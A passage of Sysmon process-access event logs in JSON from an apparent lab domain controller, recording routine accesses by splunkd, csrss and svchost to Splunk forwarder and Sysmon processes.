Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001049110600}","TargetProcessId":"1172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001049110600}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001049110600}","TargetProcessId":"1172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 